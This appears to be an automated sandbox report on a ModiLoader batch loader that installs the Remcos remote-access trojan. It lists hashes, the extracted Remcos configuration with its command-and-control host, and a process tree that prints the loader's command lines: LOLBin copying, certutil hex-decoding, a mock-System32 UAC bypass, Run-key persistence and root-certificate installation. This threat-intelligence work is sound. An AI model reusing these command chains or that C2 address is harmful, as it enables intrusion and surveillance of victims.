modiloader | 0310757cb4b15b9cff55954b52b51b39fed7ebaa8cc783caca99dc991abdf224

Analysis

max time kernel
146s
max time network
147s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24-04-2024 01:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Enquiry 230424.bat
Size

4.3MB
MD5

a9749727f9641b10363c264695ce4822
SHA1

1d3d5576790a9c72ddb03eaacac1bddd25d77477
SHA256

49cf050274b9a52bf56ac45d548d91c5a13c6d65c36bf363447ffa3f0143c078
SHA512

89ea33718530b8d3e9e4814d50c8e1d8047c2bb022c6ebc62b9479c34b6f34750a52a82b51f889d6f8fad5272bd92f2132899afee7bccdcd610a26ff7f067042
SSDEEP

49152:yEi0F7JFavH5JDy0oqMaKcCln2UE+EMKyGY6i6KyGY6i6KyGY6i6KyGY6i6KyGYO:I

Score

10^/10

modiloader remcos remotehost persistence rat trojan

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

127.0.0.1:47212

officerem.duckdns.org:47212

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-I8N3XG
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
trojan modiloader
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) 24 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2708-129-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-131-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-132-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-133-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-134-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-135-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-142-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-143-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-145-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-146-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-153-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-154-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-156-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-157-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-164-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-166-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-168-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-175-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-176-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-178-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-186-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-187-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-188-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM
behavioral1/memory/2708-189-0x0000000015E70000-0x0000000016E70000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM

ModiLoader Second Stage 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2708-36-0x0000000003370000-0x0000000004370000-memory.dmp	modiloader_stage2

Executes dropped EXE 10 IoCs

Processes:

alpha.exealpha.exekn.exealpha.exekn.exesppsvc.pifalpha.exealpha.exeeasinvoker.exeeasinvoker.exe

pid process

3060 alpha.exe
312 alpha.exe
2248 kn.exe
2376 alpha.exe
2620 kn.exe
2708 sppsvc.pif
2580 alpha.exe
2888 alpha.exe
2784 easinvoker.exe
628 easinvoker.exe
Loads dropped DLL 7 IoCs

Processes:

cmd.exealpha.exealpha.exe

pid process

2880 cmd.exe
2880 cmd.exe
312 alpha.exe
2880 cmd.exe
2376 alpha.exe
2880 cmd.exe
2880 cmd.exe

pid	process
3060	alpha.exe
312	alpha.exe
2248	kn.exe
2376	alpha.exe
2620	kn.exe
2708	sppsvc.pif
2580	alpha.exe
2888	alpha.exe
2784	easinvoker.exe
628	easinvoker.exe

pid	process
2880	cmd.exe
2880	cmd.exe
312	alpha.exe
2880	cmd.exe
2376	alpha.exe
2880	cmd.exe
2880	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

sppsvc.pif

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\Run\Rwksdoeb = "C:\\Users\\Public\\Rwksdoeb.url"	sppsvc.pif

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

xcopy.exexcopy.exexcopy.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	xcopy.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

Processes:

sppsvc.pif

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C	sppsvc.pif
Set value (data)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\SystemCertificates\CA\Certificates\D89E3BD43D5D909B47A18977AA9D5CE36CEE184C\Blob = 030000000100000014000000d89e3bd43d5d909b47a18977aa9d5ce36cee184c1400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000285ec909c4ab0d2d57f5086b225799aa0f000000010000003000000013baa039635f1c5292a8c2f36aae7e1d25c025202e9092f5b0f53f5f752dfa9c71b3d1b8d9a6358fcee6ec75622fabf9190000000100000010000000ea6089055218053dd01e37e1d806eedf1800000001000000100000002aa1c05e2ae606f198c2c5e937c97aa22000000001000000850500003082058130820469a00302010202103972443af922b751d7d36c10dd313595300d06092a864886f70d01010c0500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3139303331323030303030305a170d3238313233313233353935395a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f23081ef301f0603551d23041830168014a0110a233e96f107ece2af29ef82a57fd030a4b4301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030430603551d1f043c303a3038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c303406082b0601050507010104283026302406082b060105050730018618687474703a2f2f6f6373702e636f6d6f646f63612e636f6d300d06092a864886f70d01010c05000382010100188751dc74213d9c8ae027b733d02eccecf0e6cb5e11de226f9b758e9e72fee4d6feaa1f9c962def034a7eaef48d6f723c433bc03febb8df5caaa9c6aef2fcd8eea37b43f686367c14e0cdf4f73ffedeb8b48af09196fefd43647efdccd201a17d7df81919c9422b13bf588bbaa4a266047688914e0c8914cea24dc932b3bae8141abc71f15bf0410b98000a220310e50cb1f9cd923719ed3bf1e43ab6f945132675afbbaaef3f7b773bd2c402913d1900d3175c39db3f7b180d45cd9385962f5ddf59164f3f51bdd545183fed4a8ee80661742316b50d50732744477f105d892a6b853114c4e8a96a4c80bc6a78cfb87f8e7672990c9dfed7910816a1a35f95	sppsvc.pif

Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.

Processes:

description flow ioc

HTTP User-Agent header 4 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

sppsvc.pif

pid process

2708 sppsvc.pif
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

sppsvc.pif

pid process

2708 sppsvc.pif

description	flow	ioc
HTTP User-Agent header	4	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

pid	process
2708	sppsvc.pif

pid	process
2708	sppsvc.pif

Suspicious use of WriteProcessMemory 63 IoCs

Processes:

cmd.exealpha.exealpha.exealpha.exesppsvc.pifcmd.exe

description	pid	process	target process
PID 2880 wrote to memory of 2944	2880	cmd.exe	extrac32.exe
PID 2880 wrote to memory of 2944	2880	cmd.exe	extrac32.exe
PID 2880 wrote to memory of 2944	2880	cmd.exe	extrac32.exe
PID 2880 wrote to memory of 3060	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 3060	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 3060	2880	cmd.exe	alpha.exe
PID 3060 wrote to memory of 2760	3060	alpha.exe	extrac32.exe
PID 3060 wrote to memory of 2760	3060	alpha.exe	extrac32.exe
PID 3060 wrote to memory of 2760	3060	alpha.exe	extrac32.exe
PID 2880 wrote to memory of 312	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 312	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 312	2880	cmd.exe	alpha.exe
PID 312 wrote to memory of 2248	312	alpha.exe	kn.exe
PID 312 wrote to memory of 2248	312	alpha.exe	kn.exe
PID 312 wrote to memory of 2248	312	alpha.exe	kn.exe
PID 2880 wrote to memory of 2376	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2376	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2376	2880	cmd.exe	alpha.exe
PID 2376 wrote to memory of 2620	2376	alpha.exe	kn.exe
PID 2376 wrote to memory of 2620	2376	alpha.exe	kn.exe
PID 2376 wrote to memory of 2620	2376	alpha.exe	kn.exe
PID 2880 wrote to memory of 2708	2880	cmd.exe	sppsvc.pif
PID 2880 wrote to memory of 2708	2880	cmd.exe	sppsvc.pif
PID 2880 wrote to memory of 2708	2880	cmd.exe	sppsvc.pif
PID 2880 wrote to memory of 2708	2880	cmd.exe	sppsvc.pif
PID 2880 wrote to memory of 2580	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2580	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2580	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2888	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2888	2880	cmd.exe	alpha.exe
PID 2880 wrote to memory of 2888	2880	cmd.exe	alpha.exe
PID 2708 wrote to memory of 2404	2708	sppsvc.pif	cmd.exe
PID 2708 wrote to memory of 2404	2708	sppsvc.pif	cmd.exe
PID 2708 wrote to memory of 2404	2708	sppsvc.pif	cmd.exe
PID 2708 wrote to memory of 2404	2708	sppsvc.pif	cmd.exe
PID 2404 wrote to memory of 1296	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 1296	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 1296	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 1296	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 1808	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 1808	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 1808	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 1808	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2488	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2488	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2488	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2488	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2660	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2660	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2660	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2660	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2664	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2664	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2664	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2664	2404	cmd.exe	cmd.exe
PID 2404 wrote to memory of 2528	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2528	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2528	2404	cmd.exe	xcopy.exe
PID 2404 wrote to memory of 2528	2404	cmd.exe	xcopy.exe
PID 2708 wrote to memory of 2024	2708	sppsvc.pif	extrac32.exe
PID 2708 wrote to memory of 2024	2708	sppsvc.pif	extrac32.exe
PID 2708 wrote to memory of 2024	2708	sppsvc.pif	extrac32.exe
PID 2708 wrote to memory of 2024	2708	sppsvc.pif	extrac32.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\Enquiry 230424.bat"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2880

C:\Windows\System32\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\\Windows\\System32\\cmd.exe C:\\Users\\Public\\alpha.exe
2⤵
PID:2944

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3060

C:\Windows\system32\extrac32.exe
extrac32.exe /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
3⤵
PID:2760

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Enquiry 230424.bat" "C:\\Users\\Public\\sppsvc.rtf" 9
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:312

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\Enquiry 230424.bat" "C:\\Users\\Public\\sppsvc.rtf" 9
3⤵
- Executes dropped EXE
PID:2248

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2376

C:\Users\Public\kn.exe
C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\sppsvc.rtf" "C:\\Users\\Public\\Libraries\\sppsvc.pif" 12
3⤵
- Executes dropped EXE
PID:2620

C:\Users\Public\Libraries\sppsvc.pif
C:\Users\Public\Libraries\sppsvc.pif
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2708

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Users\Public\Libraries\RwksdoebO.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:2404

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
4⤵
PID:1296

C:\Windows\SysWOW64\xcopy.exe
xcopy "easinvoker.exe" "C:\Windows \System32\" /K /D /H /Y
4⤵
- Enumerates system info in registry
PID:1808

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
4⤵
PID:2488

C:\Windows\SysWOW64\xcopy.exe
xcopy "Aaa.bat" "C:\Windows \System32\" /K /D /H /Y
4⤵
- Enumerates system info in registry
PID:2660

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECHO F"
4⤵
PID:2664

C:\Windows\SysWOW64\xcopy.exe
xcopy "netutils.dll" "C:\Windows \System32\" /K /D /H /Y
4⤵
- Enumerates system info in registry
PID:2528

C:\Windows \System32\easinvoker.exe
"C:\Windows \System32\easinvoker.exe"
4⤵
- Executes dropped EXE
PID:2784

C:\Windows \System32\easinvoker.exe
"C:\Windows \System32\easinvoker.exe"
4⤵
- Executes dropped EXE
PID:628

C:\Windows\SysWOW64\extrac32.exe
C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\sppsvc.pif C:\\Users\\Public\\Libraries\\Rwksdoeb.PIF
3⤵
PID:2024

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\sppsvc.rtf" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2580

C:\Users\Public\alpha.exe
C:\\Users\\Public\\alpha /c del "C:\Users\Public\kn.exe" / A / F / Q / S
2⤵
- Executes dropped EXE
PID:2888

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat
Filesize
144B

MD5
4daa8fbb8e17f6b182e3174b46b6738f

SHA1
ada8dd1ea84fe2856b7b2d1af5c2c1f317b8a694

SHA256
2de3642414ff2e7d21de107cac6ab08cdbde925f56451591510f8d3c5eeeaddd

SHA512
5c3164c1cc0544ddf06c3c5e7c08739cb84f58b224d75e026aa0327c01ed254ea3bf983a71d68c729c90ec82b32d0a46ad2e32aaa00d040fa9277c747a69faa0

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar4A21.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Public\Libraries\RwksdoebO.bat
Filesize
29KB

MD5
828ffbf60677999579dafe4bf3919c63

SHA1
a0d159a1b9a49e9eaccc53fe0c3266c0526a1bdc

SHA256
abac4a967800f5da708572ec42441ec373cd52459a83a8a382d6b8579482789d

SHA512
bf00909e24c5a6fb2346e8457a9adacd5f1b35988d90abbde9ff26896bbb59edafea60d9db4d10182a7b5e129bb69585d3e20bc5c63af3517b3a7ef1e45ffb7e

Download Submit
C:\Users\Public\Libraries\easinvoker.exe
Filesize
128KB

MD5
231ce1e1d7d98b44371ffff407d68b59

SHA1
25510d0f6353dbf0c9f72fc880de7585e34b28ff

SHA256
30951db8bfc21640645aa9144cfeaa294bb7c6980ef236d28552b6f4f3f92a96

SHA512
520887b01bda96b7c4f91b9330a5c03a12f7c7f266d4359432e7bacc76b0eef377c05a4361f8fa80ad0b94b5865699d747a5d94a2d3dcdb85dabf5887bb6c612

Download Submit
C:\Users\Public\Libraries\netutils.dll
Filesize
112KB

MD5
6baaea4d3a65281b55173738795eb02c

SHA1
1fbe7ec7f5e2d1fb0ab1807e149eee66a86f9224

SHA256
0007fa57da2e1de2e487492d00b99abaeca7e9f9cac8a10e24eb569e19f76ee1

SHA512
af0285cf961aeae960ede41f195809e9b84ccb262f17f2e994da5c599ebdf712788e5a3f2e0e2ed16e67aa888bdabfd7a6096ad8dda2d062d2f82b010e81d5c5

Download Submit
C:\Users\Public\Libraries\sppsvc.pif
Filesize
1.6MB

MD5
dee7b7ad4c8bdd4cbe56469e34a8cadd

SHA1
f723d5895c324e4454b68de3bc031b627e720ac4

SHA256
7f39a73e476fd5ceea7099aaceda19836990529cba7b032244a892ddd785fe02

SHA512
6af58088d2016354e4a61beedf6c11b3e7a0cd14d2aef5f6c3a3f9ed56b2feb52132fff09e9c5b13b8a99d2f754bfeeb962bba5956d8bdc21d0be8072352a419

Download Submit
C:\Users\Public\sppsvc.rtf
Filesize
3.1MB

MD5
063a2a4888ffd2c1e64898bed64e9aa7

SHA1
087cf84d030b805f9e574c3010d40bdd3d7503b5

SHA256
c894d82ed3f2d258c9f663afdd16b4c1d90f0d0c57fa13707811524c5e9e30b0

SHA512
a36ce728252252dbab3e800f666072923955e2f1fd262893624cbfa7a256dbb79b148be2881af9ec903fadd799e0796d9c12e34d17f4c8b8f494daa55d3e3cdb

Download Submit
\Users\Public\alpha.exe
Filesize
337KB

MD5
5746bd7e255dd6a8afa06f7c42c1ba41

SHA1
0f3c4ff28f354aede202d54e9d1c5529a3bf87d8

SHA256
db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386

SHA512
3a968356d7b94cc014f78ca37a3c03f354c3970c9e027ed4ccb8e59f0f9f2a32bfa22e7d6b127d44631d715ea41bf8ace91f0b4d69d1714d55552b064ffeb69e

Download Submit
\Users\Public\kn.exe
Filesize
1.1MB

MD5
ec1fd3050dbc40ec7e87ab99c7ca0b03

SHA1
ae7fdfc29f4ef31e38ebf381e61b503038b5cb35

SHA256
1e19c5a26215b62de1babd5633853344420c1e673bb83e8a89213085e17e16e3

SHA512
4e47331f2fdce77b01d86cf8e21cd7d6df13536f09b70c53e5a6b82f66512faa10e38645884c696b47a27ea6bddc6c1fdb905ee78684dca98cbda5f39fbafcc2

Download Submit
memory/2404-115-0x00000000004E0000-0x00000000004E1000-memory.dmp

Filesize
4KB

Download
memory/2708-135-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-153-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-38-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2708-36-0x0000000003370000-0x0000000004370000-memory.dmp

Filesize
16.0MB

Download
memory/2708-129-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-131-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-132-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-133-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-134-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-35-0x0000000003370000-0x0000000004370000-memory.dmp

Filesize
16.0MB

Download
memory/2708-142-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-143-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-29-0x0000000000220000-0x0000000000221000-memory.dmp

Filesize
4KB

Download
memory/2708-145-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-146-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-39-0x0000000000400000-0x000000000059C000-memory.dmp

Filesize
1.6MB

Download
memory/2708-154-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-156-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-157-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-164-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-166-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-168-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-175-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-176-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-178-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-186-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-187-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-188-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download
memory/2708-189-0x0000000015E70000-0x0000000016E70000-memory.dmp

Filesize
16.0MB

Download